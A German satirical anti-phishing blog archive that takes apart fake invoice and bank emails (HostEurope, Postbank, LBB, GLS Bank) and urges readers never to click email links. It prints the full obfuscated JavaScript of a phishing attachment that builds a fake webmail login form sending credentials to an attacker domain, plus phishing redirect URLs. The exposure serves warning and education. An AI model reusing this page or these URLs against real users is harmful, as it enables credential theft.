Kategoriearchiv „Phishing“

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.

Wichtige Mitteilung !

Montag, 18. April 2022

Nein, unwichtiges Phishing. 💩️

Von: Postbank AG <progress@vps.granhostingperu.com>

Tolle Domain, die die Postbank jetzt für ihre Mailadressen benutzt. 🤭️

Schon an der Stelle ist völlig klar, dass es sich nicht um eine Mail der Postbank handelt. Der Spammer hätte allerdings auch eine plausible Absenderadresse eintragen können… wenn er nur ein bisschen Hirn gehabt hätte. 😁️

Man kann in eine E-Mail jede beliebige Absenderadresse eintragen. 🤥️

An: progress@vps.granhostingperu.com

Das bin ich nicht. Diese Mail geht als BCC: an ganz viele Empfänger auf einmal. Sie ist so persönlich wie eine Postwurfsendung. 🗑️

die neue Postbank ist da und damit werden Ihre Überweisungen in Postbank noch sicherer Um unseren Service und die Qualität unserer Leistungen auf dem höchsten Niveau zu halten

bitten wir Sie die App Bis zum 18. April 2022 aktivieren:

Hier klicken

Postbank © Alle Rechte vorbehalten

Das ist ja toll. Die neue Postbank ist da. 📯️

Sie kann zwar keine Punkte mehr schreiben und sie geht nur noch mit einer App (würde also zum Beispiel mich gar nicht mehr als Kunden haben wollen), aber dafür muss man die App auch selbst „aktivieren“. Indem man in eine Spam klickt. Und zwar sofort. Also ohne darüber noch nachzudenken. 🧠️🚫️

Wer das macht, hat verloren:

$ location-cascade https://scottwinslow.com//inc/.app
     1	https://scottwinslow.com/inc/.app/
     2	https://trgeahadhhelpgenesh.com/xamp/bodepostglawa/bazaz/
$ lynx -dump https://trgeahadhhelpgenesh.com/xamp/bodepostglawa/bazaz/ | sed 10q
   [1]Logo der Postbank. Text: Eine Bank fürs Leben. Logo der Postbank.
   Text: Eine Bank fürs Leben.
   (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON) (BUTTON)

Willkommen beim Postbank Banking & Brokerage

     * Melden Sie sich hier bitte mit Ihrer Postbank ID an. Nach Klick auf
       "Weiter im Anmeldeprozess" legitimieren Sie sich mit Ihrem Passwort
       oder mithilfe einer unserer Apps.
       (BUTTON) [info.png] Info
$ _

Die Website, auf der man die Zugangsdaten zu seinem Postbank-Kundenbereich angeben soll, ist natürlich nicht die Website der Postbank, obwohl sie so aussieht. Die Zugangsdaten und alle weiteren eingegebenen Daten gehen direkt an eine Betrügerbande. Wenn man darauf reinfällt, wird es teuer und es gibt eine Menge Ärger – leider nicht für die Betrüger, die sich mit dem Geld anderer Leute einen schönen, verfeinerten Lebensstil finanzieren. 🤢️

Phishing ist eine der ältesten und immer noch die häufigste Betrugsform im Internet, und die angerichteten Schäden sind enorm. Sie machen rd. ein Fünftel des Gesamtschadens durch Internetkriminalität aus. Zum Glück gibt es einen völlig sicheren Schutz vor Phishing, der einfach ist und nichts kostet: Nicht in eine E-Mail klicken! Wenn man für alle regelmäßig besuchten Websites ein Lesezeichen im Webbrowser anlegt und sich angewöhnt, diese Websites nur über das Lesezeichen zu besuchen und niemals durch einen Klick in eine Mail, dann kann einem kein Betrüger einen vergifteten Link unterschieben und man ist vor einer der häufigsten Betrungsmaschen im Internet sicher, was schnell tausende von Euro und ganz viel durch Ärger verhagelte Lebenszeit einsparen kann. Und das ohne Komfortverlust. Und mit nur minimalem Aufwand. 👍️😎️

Wenn man dann einmal eine komische „Mail seiner Bank“ bekommen sollte, die man nicht auf den ersten Blick als Betrugsversuch erkennt, ruft man einfach die Website der Bank über das Browserlesezeichen auf und meldet sich dort ganz normal an, statt darin zu klicken oder Anhänge zu öffnen. Wenn man dabei nicht einen ähnlichen Hinweis zu sehen bekommt wie in der E-Mail, dann war die E-Mail ein Phishing-Versuch und man hat einen kriminellen Angriff abgewehrt. So einfach geht das! 🛡️

Sollen die Betrüger doch verhungern! 🤬️

Re : Wichtige Mitteilung !

Freitag, 15. April 2022

Abt.: Ganz schlechtes Phishing 🤦‍♂️️

Success

Bitte reaktivieren Sie Ihr Konto!

Sehr geehrtern,

Ihre LBB-Bank informiert Sie darüber, dass Sie den neuen mTan-Service aktivieren müssen, um Ihre Zahlung im Internet abzusichern :

Aktualisiere meine Informationen

Signature

Ohne weitere Worte.

Wichtige neue Nachricht

Dienstag, 12. April 2022

Eine Nachricht ist es, wichtig ist sie nicht. Warum ich das vor dem Lesen sicher sagen kann? Weil sie…

Von: GLS BANK <noreply@gls.de>
An: gammelfleisch@tamagothi.de

…im Töpfchen für Sieger liegt. 🚽️

Natürlich schreibt hier nicht eine GLS Bank, bei der ich nicht einmal Kunde bin, sondern ein Spammer, der sich seine Mailadressen zum Zukacken mit einem Skript aus dem Web abholt.

Hallo,

Genau mein Name! 👏️

Ihr Konto ist aufgrund einer Störung vorübergehend gesperrt

